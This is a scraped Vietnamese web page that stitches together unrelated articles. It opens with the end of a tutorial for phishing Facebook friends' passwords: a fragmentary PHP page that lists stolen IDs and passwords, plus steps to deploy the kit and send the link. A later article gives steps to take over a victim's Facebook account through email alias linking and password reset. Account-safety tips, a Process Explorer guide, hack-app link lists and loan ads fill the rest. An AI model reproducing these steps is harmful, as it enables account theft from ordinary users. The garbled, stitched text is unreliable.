  Để xem người dùng bị lưu thông tin hoặc id và mật khẩu tài khoản facebook bị tấn công, bạn phải truy cập lại cơ sở dữ liệu của mình, do đó, để dễ dàng xem id và mật khẩu tài khoản facebook bị tấn công, chỉ cần tạo một trang web khác tìm nạp và liệt kê tài khoản facebook id và mật khẩu từ cơ sở dữ liệu ở dạng bảng như trong đoạn mã sau:

  <?php

  $conn = mysqli_connect('localhost', 'root', '', 'fbhackedusers');

  table th, td{border:1px solid black;padding:10px;}

  <?php

  $sql = "select * from fbusers";

  while($row=mysqli_fetch_row($res))

  {

  }

  Đặt tệp trên vào cùng một thư mục với tên hackedusers.php.

  Ví dụ về cách hack tài khoản Facebook

  Bây giờ chúng ta hãy xem ảnh chụp màn hình từng bước của việc hack id tài khoản facebook và mật khẩu bạn bè của bạn.

  Đây là ảnh chụp màn hình của trang đăng nhập demo khi bạn bè của bạn nhấp vào liên kết bạn đã gửi cho anh ấy / cô ấy.

  Đây là ảnh chụp màn hình demo sau khi nhập thông tin đăng nhập facebook:

  ID và mật khẩu tài khoản facebook bạn bè của bạn được lưu trữ bên trong cơ sở dữ liệu của bạn, bạn có thể xem danh sách những người dùng facebook bị tấn công. Bạn sẽ thấy bằng cách sử dụng trang web của mình, được tạo bằng bước cuối cùng (bước thứ 6). Mở trình duyệt và nhập localhost/hackedusers.php

  Bước cuối cùng là triển khai hệ thống hack tài khoản Facebook trực tiếp ra ngoài mạng internet

  Bây giờ là bước cuối cùng và cần thiết nhất để thực hiện nó để làm cho hệ thống hack tài khoản facebook của bạn hoạt động bằng cách sử dụng trang web của bạn, đây là một số bước. Nếu bạn đã có một trang web. Ví dụ: nếu bạn có một trang web có tên là Kenh49 hoặc bất kỳ trang web nào khác, thì:

  • Tạo một thư mục nói rằng facebook bên trong thư mục mẹ
  • Tạo một cơ sở dữ liệu và sau đó lập bảng bên trong cùng một cơ sở dữ liệu với các chi tiết giống như được sử dụng trong đoạn mã hack tài khoản facebook ở trên
  • Đặt tất cả các tệp, có nghĩa là, chúng tôi , chúng tôi , chúng tôi , chúng tôi và các tệp hình ảnh, ở đây earnmoney.jpg bên trong thư mục có tên facebook
  • Bây giờ hãy gửi liên kết cho bạn bè của bạn, đó là chúng tôi
  • Và mở liên kết trong trình duyệt của bạn, đó là chúng tôi

  Sau khi thực hiện tất cả những điều trên, bạn cần thay đổi chuỗi kết nối, đó là bạn phải thay localhost bằng địa chỉ hosting của bạn, root bằng tên người dùng cơ sở dữ liệu, mật khẩu bằng mật khẩu cơ sở dữ liệu của bạn. và sau đó thay thế localhost/ thành https://www.kenh49.vn/facebook/

  Bạn cũng có thể thực hiện một số thay đổi cho phù hợp để hack id và mật khẩu tài khoản facebook của bất kỳ ai vì hướng dẫn này chỉ là bản demo, cho bạn thấy cách bạn có thể hack tài khoản facebook của bất kỳ ai bằng một số phương pháp đơn giản.

  Lưu ý khi sử dụng Internet

  Ở đây tôi đã cung cấp hướng dẫn đầy đủ, các bước từ đầu đến cuối việc hack tài khoản facebook bằng cách sử dụng tấn công lừa đảo chỉ để bạn biết rằng liên kết lạ gửi cho bạn sẽ như thế nào, có thể khiến bạn gặp rắc rối sau khi mở và điền một số chi tiết bên trong trang web không xác định, Đôi khi chỉ cần nhấp vào một liên kết ngẫu nhiên nào đó, bạn có thể bị tấn công hoặc tài khoản của bạn có thể bị tấn công vì có nhiều loại tin tặc có sẵn trên internet và khiến bạn gặp rắc rối khi nhấp vào một liên kết lạ. Và do đó hãy lưu ý khi sử dụng internet.

  --- Bài cũ hơn ---

 • Lmht: Thanh Niên Hack Nick, Ngang Nhiên Rao Bán Tài Khoản Của Bm Archie
 • Các Cách Hack Rip Nick Zalo Và Cách Phòng Tránh.
 • Cách Hack Nick Zalo Của Người Khác Bằng Điện Thoại, Máy Tính
 • Tải Game Megaman X4 Cho Pc Full Hướng Dẫn Cài Đặt Chi Tiết
 • Cách Lấy Giáp Bí Mật Trong Megaman X5, Lấy Black Zero, Lấy Ultimate X
 • Tài Khoản Liên Minh Huyền Thoại Bị Hack

  --- Bài mới hơn ---

 • Cách Hack 3G 4G Mimax Viettel 2022 Cho Android
 • Hướng Dẫn Cách Hack 3G Mimax Vinaphone, Mobiphone, Viettel
 • Top Tanker Hot Nhất Tại Na3D
 • Tải Hack Game Miễn Phí 100% Không Quảng Cáo
 • Phương Thức Bảo Mật Otp Liệu Có Thể Bị Phá Vỡ?
 • Tài khoản Liên Minh Huyền Thoại bị Hack – Những cách bảo vệ an toàn nhất

  Tài khoản Liên Minh Huyền Thoại bị Hack – Những cách bảo vệ an toàn nhất

  Đăng nhập tài khoản vào các trang web lừa đảo nạp thẻ, lừa đảo bán code, bán các vật phẩm khác trong game, …

  Chia sẻ tài khoản cho người khác và bị thay đổi thông tin.

  Sử dụng tài khoản đăng nhập trên thiết bị khác và quên đăng xuất tài khoản.

  1. Ưu tiên phòng hơn chống:

  Bảo mật tài khoản là điều quan trọng nhất nhưng vẫn còn không ít những người chơi Liên Minh Huyền Thoại chưa quan tâm đến điều này, để đến khi chuyện đã xảy ra rồi thì khóc lóc cũng đã muộn, vậy nên ưu tiên phòng hơn chống là giải pháp tối ưu nhất. Thường thì các ứng dụng hỗ trợ chơi game như Garena đều đã được chuẩn bị sẵn các giải pháp bảo mật tối ưu nhất có thể để giảm thiểu tối đa các vấn nạn hack, ăn cắp tài khoản. Do đó đừng bỏ qua các bước thiết lập bảo mật này nếu bạn muốn bảo vệ tài khoản của mình một cách tối ưu nhất. Tài khoản Garena được cung cấp 4 phương thức bảo mật gồm:

  Bên cạnh đó, hãy thường xuyên thay đổi mật khẩu tài khoản. Trong quá trình sử dụng, có thể bạn đã đăng nhập tài khoản trên nhiều máy tính, thiết bị di động khác nhau. Việc này có nguy cơ khiến mật khẩu bị lộ (thiết bị nhiễm virus hoặc chứa các phần mềm đánh cắp thông tin tài khoản,..). Vì vậy hãy thường xuyên thay đổi mật khẩu 2-3 tháng một lần, điều này sẽ giúp tài khoản của bạn trở nên an toàn hơn.

  2. Không truy cập các trang Web & Fanpage không rõ nguồn gốc, lừa đảo:

  Các trang Web & Fanpage không rõ nguồn gốc, lừa đảo thường được thiết kế giống y hệt trang web chính thức của Garena. Trong những Web & Fanpage đó sẽ đăng hàng loạt các khuyến mãi khủng, phát giftcode giá trị lớn, tổ chức giải đấu hấp dẫn,… nhằm mục đích đánh cắp tài khoản người dùng. Vì vậy để nhận biết các trang web/fanpage này, các bạn cần chú ý các đặc điểm sau:

  Đường dẫn trang web sẽ không có đuôi “.garena.vn”

  Fanpage không có dấu stick xanh của Facebook

  Yêu cầu khách hàng cung cấp mật khẩu tài khoản, mật khẩu Email,….

  Garena không bao giờ yêu cầu khách hàng cung cấp mật khẩu tài khoản hoặc mật khẩu Email. Khi gặp các trang web có dấu hiệu như trên, hãy cung cấp thông tin cho đội ngũ Garena tôi Tại đây để kịp thời ngăn chặn những hành vi xấu xảy ra, bảo đảm an toàn cho toàn bộ cộng đồng game thủ.

  4. Bảo vệ tài khoản khi bị hack

  Trường hợp cuối cùng là khi bạn phát hiện đã có kẻ xâm nhập được vào tài khoản của mình, hãy bình tĩnh thực hiện theo các bước sau:

  Bước 1: Đăng xuất tài khoản ra khỏi các thiết bị

  Để tránh trường hợp người lạ vẫn còn lưu đăng nhập trên thiết bị của họ và vào tài khoản thực hiện các thao tác trong game ngoài ý muốn, bạn cần đăng xuất tài khoản game ra khỏi các thiết bị.

  Bước 2: Yêu cầu tạm khóa tài khoản ingame

  Sau khi đăng xuất tài khoản ra khỏi các thiết bị, hãy gửi yêu cầu tạm khóa tài khoản để bảo vệ tài khoản nhằm tránh các trường hợp người lạ nắm được thông tin mật khẩu có thể đăng nhập lại tài khoản của bạn. Bạn sẽ có thêm thời gian để thay đổi mật khẩu và cập nhật các thông tin bảo mật cần thiết.

  Bước 3: Thay đổi mật khẩu tài khoản

  Lưu ý: Nếu tài khoản chưa có đăng ký thông tin bảo mật hoặc các thông tin bảo mật không còn sử dụng được, bạn cần gửi yêu cầu thay đổi mật khẩu qua phiếu yêu cầu của Garena để được hỗ trợ tại đây

  Bước 4: Kiểm tra thông tin bảo mật

  Sau khi tiến hành đổi mật khẩu, hãy đăng nhập và kiểm tra các thông tin bảo mật trong tài khoản. Nếu tài khoản chưa xác thực hoặc chỉ xác thực 1 thông tin bảo mật, việc bị xâm nhập sẽ khiến tài khoản không còn an toàn nữa. Kẻ gian có thể tự thêm các thông tin bảo mật đang còn thiếu và khiến bạn gặp khó khăn trong việc được hỗ trợ hoặc xử lý tranh chấp. Vì vậy hãy kiểm tra ngay lại các thông tin bảo mật của mình và nếu phát hiện các thông tin sai lệch, hãy liên hệ ngay với đội ngũ chăm sóc của Garena để được hỗ trợ thay đổi lại các thông tin bảo mật.

  --- Bài cũ hơn ---

 • Hướng Dẫn Hack Camera Giám Sát Chi Tiết Từ A
 • Lưu Ý Một Số Cách Hack Camera Quan Sát Bằng Điện Thoại
 • 8 Simple Ways To Hack Your Joomla
 • Hướng Dẫn Phát Hiện Và Loại Bỏ Shell Trên Website Joomla
 • Reset Khôi Phục Mật Khẩu Joomla
 • Hacker Hé Lộ Cách Hack Mọi Tài Khoản Facebook

  --- Bài mới hơn ---

 • Tải Liên Quân Mobile (Hack Map, Vô Hạn Tiền) Cho Android
 • Tăng Hàng Triệu View Dễ Dàng
 • Top 12 Phần Mềm Tăng View Youtube Miễn Phí Nhanh Nhất 2022
 • War Robots Mod Apk 7.2.0 (Vô Hạn Bullets, Bots Bất Động)
 • Tải War Robots Mod Apk 7.2.1 (Vô Hạn Rockets) Cho Android
 • Lỗ hổng trên mạng xã hội lớn nhất thế giới cho phép người dùng có thể lấy mật khẩu của bất kỳ tài khoản nào. Hiện lỗi này đã được vá.

  Hacker người Ấn Độ Anand Prakash đã tìm ra một lỗ hổng tưởng chừng khá đơn giản nhưng lại tồn tại trên một hệ thống tầm cỡ như Facebook. Với cách của ông, bất kỳ ai đều có thể đánh cắp tài khoản của người khác mà không cần những kiến thức chuyên sâu về công nghệ thông tin.

  Trang Reset Password của Facebook.

  Anand Prakash sử dụng cơ chế lấy lại mật khẩu (Reset Password) trên Facebook và thông thường khi có yêu cầu này, mạng xã hội sẽ trả về email hay số điện thoại của chủ tài khoản chuỗi 6 chữ số. Do không có đoạn mã này, ông đã tiến hành “brute force” – thử lần lượt từng số bằng phần mềm tự động.

  Dĩ nhiên, Facebook thừa giỏi để đặt ra giới hạn số lần thử sai. Song trên trang chúng tôi và chúng tôi thì hãng lại “quên” thiết lập và cho phép tin tặc có thể thử bao nhiêu lần tùy ý.

  Với việc khai thác thành công hổng này, Anand Prakash đã lấy được mật khẩu và có thể đăng nhập vào tài khoản Facebook bất kỳ mà không cần biết mật khẩu cũ.

  Thông báo thưởng 15.000 USD từ Facebook cho phát hiện của Anand.

  Kẽ hở trong hệ thống của mạng xã hội lớn nhất thế giới được phát hiện trong tháng hai và ông đã báo cho Facebook biết. Đáp lại, Facebook mới đây thưởng cho Anand Prakash số tiền 15.000 USD nhờ phát hiện lỗi và dĩ nhiên lỗ hổng này đã được vá trước khi công bố.

  Theo VNE

  --- Bài cũ hơn ---

 • Ultimate Car Driving Simulator Mod Apk 5.7 (Menu, Vô Hạn Tiền)
 • Ultimate Car Driving Simulator V5.5
 • Tải Game Ultimate Car Driving Simulator (Mod Vô Hạn Tiền) 5.7 Apk
 • Cách Hack Uc Pubg Mobile Ios 19.0
 • Tải Township Hack Android, Ios (Vô Hạn Tiền, Vàng)
 • Cách Khôi Phục Lại Tài Khoản Gmail Bị Hack

  --- Bài mới hơn ---

 • Cách Thức Để Hack Mật Khẩu Gmail
 • Pubg: Các Thể Loại Hack Pubg Phổ Biến Và Cách Nhận Biết
 • Hack Mod Free Fire V1.57 Aimbot, Headshot, Full Skin, Anti Ban
 • Cách Hack Audition Nhanh, Chính Xác Cho Các Anh Em Game Thủ
 • Hướng Dẫn Tải Tool Tsmodz Và Cách Hack Audition Hiện Nay
 • Gần đây nhiều bạn gửi thông tin về SecurityDaily nhờ trợ giúp về việc bị mất tài khoản Google/Gmail ngay cả khi đã kích hoạt các tính năng xác thực 2 bước. Về cơ bản, với một mật khẩu mạnh (kết hợp chữ cái, số và kí tự) và kích hoạt tính năng xác thực 2 bước là cách rất tốt để bảo vệ tài khoản của bạn trước những kẻ tấn công. Nhưng tài khoản của bạn vẫn có thể bị tấn công theo một số kịch bản nhất định

  • Kẻ tấn công đoán được hoặc biết mật khẩu của bạn và có cả điện thoại của bạn.
  • Kẻ tấn công biết mật khẩu của bạn (thông qua các chương trình gián điệp, keylogger, khai thác lỗ hổng để chiếm quyền kiểm soát máy tính của bạn…) và thực hiện đăng nhập trên máy tính tin cậy, không cần xác thực bước thứ 2(kẻ tấn công đã chiếm được quyền kiểm soát máy tính của bạn).

  Vậy phải làm gì khi tài khoản của bạn đã bị xâm nhập? Nếu tin tặc đã thay đổi mật khẩu, câu hỏi bảo mật, địa chỉ email khôi phục và tất cả các số điện thoại liên kết với tài khoản thì bạn sẽ không thể khôi phục lại tài khoản Gmail theo những phương pháp thông thường.

 • Mật khẩu cuối cùng mà bạn nhớ (bắt buộc)?
 • Thời gian cuối cùng (ngày, tháng, năm) bạn có thể đăng nhập vào tài khoản Gmail (bắt buộc)?
 • Bạn tạo tài khoản Gmail khi nào (tháng và năm) (bắt buộc)?
 • Câu hỏi bảo mật của bạn là gì?
 • Liệt kê hơn 5 địa chỉ email liên lạc thường xuyên.
 • Liệt kê hơn 4 label.
 • Địa chỉ email khôi phục đầu tiên của bạn là gì?
 • Liệt kê 4 sản phẩm khác của Google mà bạn sử dụng cùng với Gmail và thời gian (tháng và năm) bạn bắt đầu sử dụng chúng.
 • Số điện thoại đã từng liên kết với tài khoản Google.
 • Thông tin tại sao bạn lại không thể truy cập vào tài khoản Google/Gmail.
 • Khi được yêu cầu xác minh danh tính bằng cách trả lời các câu hỏi về tài khoản, bạn sẽ cần càng nhiều thông tin chính xác càng tốt. Những câu hỏi mà Google yêu cầu có thể thay đổi theo cách sử dụng của bạn.

  Các bước khôi phục tài khoản Gmail bị hack

  Bước 1: Truy cập vào trang đăng nhập của Google và nhấn vào “Need help”

  --- Bài cũ hơn ---

 • Hack Game Online Miễn Phí: Hướng Dẫn Hack Gamever 2
 • Hướng Dẫnmods Phóng To, Thu Nhỏ, Giảm Lag Để Chơi Dễ Dàng Hơn
 • Hack Máy / Bẻ Khóa 3Ds
 • Cách Chơi Gragas Tốc Chiến
 • Lmht: Hướng Dẫn Combo Ẩn Gragas Có Thể Làm Choáng 2 Lần
 • Cách Hack Tài Khoản Facebook Thành Công Và Cách Tránh Bị Hack 100%

  --- Bài mới hơn ---

 • Hack Garena Free Fire Max (Mod Mở Khóa All Trang Phục Và Súng)
 • Tải Xuống Age Of Z Hack 1.2.11 (Mod,unlocked) Apk+Data Cho Android
 • Days Of Empire Mod (Unlimited Money) 2.2.11 Latest Download
 • Empire Warriors Premium Mod V2.4.13 Full Tiền (Đã Test Ok)
 • Tải Clash Of Kings Hack Unlimited Gold, Money Mod Apk
 • Cái gì mà nhiều người quan tâm bàn tán thì đột nhiên có hai thái cực xảy ra: một thái cực là cố gẳng bảo vệ nó, một bên là cố gắng tìm ra lỗ hỏng để phá. Điều này nó đã gần như trở thành xu hướng hiện nay.

  Trường hợp điển hình nhất đó chính là mạng xã hội Facebook mà chúng ta vẫn đang xài hẳng này. Điều này không có gì lạ lẫm quá đúng không? khi mà hằng ngày vẫn có nhiều người “than trời” khi đang “sóng yên biển lặn” thì lại mất nick mà không hiểu lý do từ đâu mà ra. Với thống kê từ một đơn vị thì có khoảng 2 tỉ người dùng, một kết quả quá khủng cho một mạng xã hội. Hiển nhiên, từ khóa “hack” trên hệ thống google thì “cách hack nick facebook” lọt vào top 5 tìm kiếm.

  Thì GEARVN xin hướng dẫn các bạn sử dụng cách “hack facebook” như thế nào cho hiệu quả. Nhưng chỉ trong một vài trường hợp bạn sẽ không thế hack được với một số tài khoản.

  I. CÁCH LẤY TÀI KHOẢN FACEBOOK CỦA NẠN NHÂN (XÁC SUẤT 50%)

  Việc này bạn có thể thực hiện bằng cáy tạo một tài khoản Email yahoo và nhập tất cả các số liên lạ từ tài khoản ban đầu của bạn.

  Để tiến hành thực hiện diếu này, bạn chỉ tạo tài khoản yahoo và đi tới chỉ liên hệ trên soạn thư và tạo nút “nhập danh bạ” sau đó chọn facebook.

  Sau khi chờ một vài giây thì tất cả các danh sách địa chỉ liên lạc đã được hiện lên. Bạn chỉ cần tìm đến tên của nạn nhân và cùng với đó bạn sẽ nhận được thông tin người dùng của mình.

  Bước 2: Kiểm tra địa chỉ Email bạn vừa lấy còn khả dụng hay không

  Để kiểm tra, ta dùng email của một số nhà cung cấp như: yahoo, gmail, hotmail, …. và cố gắng đăng nhập bằng ID email chính xác với password thì ghi bừa.

  Bước 5: Liên kết các tài khoản

  Đối với hotmail, bạn cần truy cập ở phần “quản lý cài đặt tài khoản”, sau đó bạn điều hướng đến phần “quản lý bí danh” và cuối cùng đó là bạn sẽ phải đăng nhập địa chỉ email của người dúng mà bạn muốn chiếm doạn nick. Lúc đó nó sẽ tự động liên kết với tài khoản của bạn mà không cần phải xác minh tài khoản có tồn tại hay không.

  Vì tài khoản đã được liên kết ngay bây giờ, bạn phải truy cập chúng tôi và yêu cầu đặt lại mật khẩu cho tài khoản được liên kết của họ (tài khoản vừa được tạo).

  II. CÁCH BẢO MẬT TÀI KHOẢN CỦA MÌNH TRÁNH BỊ CÁC “HẮC-CƠ” LẤY ĐƯỢC

  Các bạn nên xác nhận số điện thoại đang sử dụng của mình VD: chúng tôi vào tài khoản face bằng cách như sau:

  Bước 1: Login vào facebook, sau đó tiến hành vào cài đặt ở dấu mũi tên góc phải trên cùng màn hình.

  Những chia sẽ phía trên mong rằng tất cả các bạn đều có thể hoàn toàn tự bảo mật thông tin cá nhân cũng như là nick facebook của mình một cách an toàn và hiệu quả nhất.

  Từ khóa:

  -cách lấy lại nick facebook bị hack email 2022

  -cách lấy lại nick facebook bị hack email 2022

  -cách giữ nick facebook không bị hack

  -cách hack nick free fire bằng facebook

  -cách xem ai hack nick facebook của mình

  -cách hack nick facebook lấy nick free fire

  -cách hack lại nick facebook của mình 2022

  --- Bài cũ hơn ---

 • Bỏ Túi Ứng Dụng Wpspin Hack Wifi Đơn Giản Dành Cho Android
 • Dò Mật Khẩu Wifi 2022 Thành Công 100% Dùng Wifi Hàng Xóm Miễn Phí
 • Hướng Dẫn Fix Lag Zingspeed Mobile V44
 • Zombie Hunter Sniper Mod 3.0.26 Full Tiền (Vô Hạn Money)
 • Tải Game Zombie Hunter Sniper Mod Apk 3.0.29 (Vô Hạn Tiền)
 • Hack Tiền Tài Khoản Quán Nét Gcafe + Csm

  --- Bài mới hơn ---

 • Tải Game Royal Revolt 2 Hack Apk (Vô Hạn Vàng, Kim Cương)
 • Real Racing 3 Hack Apk V7.3.6 + Data Cho Android
 • Game Dragon City Hack Full Cho Android
 • Pirate Kings Xuất Hiện Hack Giúp Quay Trúng 100% Attack Và Steal?
 • Tải Subway Surfers Hack V1.108.0 (Mod Full Tiền, Chìa Khóa)
 • Process Explorer là công cụ quản lý và giám sát hệ thống, được ra mắt vào năm 2001 với phiên bản mới. Còn những phiên bản cũ đã hoạt động từ những phiên bản Windows 9x trước đó. Đây là công cụ quan trọng giúp bạn chẩn đoán và khắc phục lỗi cho hệ thống máy tính.

  Process Explorer có thể làm những gì?

  Process Explorer đi kèm nhiều tính năng quan trọng, một trong số đó phải kể đến:

  • Cây thư mục hiển thị theo cấp bậc cha – con, ngoài ra nó cũng hiển thị màu sắc riêng cho từng loại tiến trình giúp người dùng dễ dàng nhận biết hơn.
  • Theo dõi dung lượng CPU sử dụng 1 cách chính xác.
  • Có thể sử dụng để thay thế Task Manager.
  • Có thể thêm các biểu tượng để giám sát CPU, Disk, GPU, mạng, v.v…
  • Phát hiện tiến trình nào đang tải file DLL.
  • Phát hiện tiến trình nào đang mở cửa sổ
  • Phát hiện tiến trình nào có file hoặc folder đang mở hoặc khóa.
  • Xem dữ liệu về bất cứ tiến trình nào, bao gồm bộ nhớ sử dụng, đối tượng, v.v…
  • Vô hiệu hóa toàn bộ tiến trình trong 1 cây
  • Theo dõi tiến trình đang chiếm nhiều CPU.

  Bất cứ khi nào có vấn đề với ứng dụng, hoặc máy tính bị treo, hay muốn tìm kiếm file DLL sử dụng cho mục đích gì, Process Explorer là công cụ đặc biệt hữu ích dành cho việc này.

  Tổng quan về giao diện cây trong Process Explorer

  Các cột hiển thị tiến trình

  (Ảnh hướng dẫn sử dụng Process Explorer)

  Có một vài thông số bạn cần phải nắm được:

  • Process: Tiến trình hay tên file xử lý
  • CPU: Phần trăm thời gian CPU xử lý trong giây cuối cùng
  • Private Bytes: Dung lượng bộ nhớ phân bố cho từng chương trình
  • Working Set: Dung lượng RAM phân bố cho từng chương trình
  • PID: Nhận diện ID tiến trình
  • Company Name: Tên công ty phân phối

  Bạn hoàn toàn có thể tùy biến những cột phía trên nếu muốn thay đổi các tùy chọn, hoặc có thể bấm vào từng cột để sắp xếp theo thứ tự. Nó tương tự như cách mà bạn vẫn làm với Task Manager vậy.

  Tác dụng của màu sắc trong Process Explorer

  Cùng với việc nhận biết các thông số kể trên, 1 thứ nữa bạn sẽ bắt gặp đó là màu sắc hiển thị trong công cụ này. Có thể thấy rằng Process Explorer trang bị rất nhiều màu sắc cho giao diện của mình. Và cũng rất quan trọng để biết được tác dụng của những màu sắc này.

  Màu sắc hiển thị tiến trình

  (Ảnh hướng dẫn sử dụng Process Explorer)

  • New Objects: Khi 1 tiến trình mới hiển thị trên Process Explorer, nó sẽ chuyển thành màu xám.
  • Deleted Objects: Khi 1 tiến trình bị vô hiệu hóa hoặc đóng, nó sẽ nhấp nháy đỏ trước khi bị xóa.
  • Own Processes: Các tiến trình tương ứng với tài khoản sử dụng trong Process Explorer.
  • Services: Đó là các tiến trình của Windows Service, có thể tồn tại các tiến trình con tương ứng với người dùng khác, và có thể hiển thị những mầu khác màu hồng.
  • Suspended Processes: Khi 1 tiến trình bị đình chỉ, nó sẽ không thực hiện bất cứ việc gì. Bạn có thể sử dụng Process Explorer để đình chỉ 1 ứng dụng.
  • Immersive Process: Đây là cách tuyệt vời để cho biết tiến trình này là 1 ứng dụng Windows 8 sử dụng các hàm API mới.
  • Packed Images: Những tiến trình dạng này có thể bao gồm mã ẩn bên trong.

  Thực chất, khi đọc như vậy sẽ gây cảm giác khó hiểu và trừu tượng. Tuy nhiên, sau khi sử dụng nhiều tự khắc bộ óc của bạn sẽ nhận ra tác dụng của những màu sắc trên.

  --- Bài cũ hơn ---

 • Kinh Nghiệm Hack Nick Thời Loạn Thành Công Ngay Từ Lần Đầu Tiên
 • 3 Cách Hack Pokémon Go Game Thủ Lười Biếng Hay Dùng
 • Cách Chơi Pokemon Go Trên Pc, Máy Tính, Laptop Bằng Bluestacks, Hack P
 • Cách Tải Mortal Kombat X Bản Crack Chi Tiết Nhất Cho Pc
 • Cách Hack Mật Khẩu Facebook Đơn Giản Nhất 2022
 • Web hay
 • Links hay
 • Push
 • Chủ đề top 10
 • Chủ đề top 20
 • Chủ đề top 30
 • Chủ đề top 40
 • Chủ đề top 50
 • Chủ đề top 60
 • Chủ đề top 70
 • Chủ đề top 80
 • Chủ đề top 90
 • Chủ đề top 100
 • Bài viết top 10
 • Bài viết top 20
 • Bài viết top 30
 • Bài viết top 40
 • Bài viết top 50
 • Bài viết top 60
 • Bài viết top 70
 • Bài viết top 80
 • Bài viết top 90
 • Bài viết top 100
 • CẦM ĐỒ TẠI F88
  15 PHÚT DUYỆT
  NHẬN TIỀN NGAY

  VAY TIỀN NHANH
  LÊN ĐẾN 10 TRIỆU
  CHỈ CẦN CMND

  ×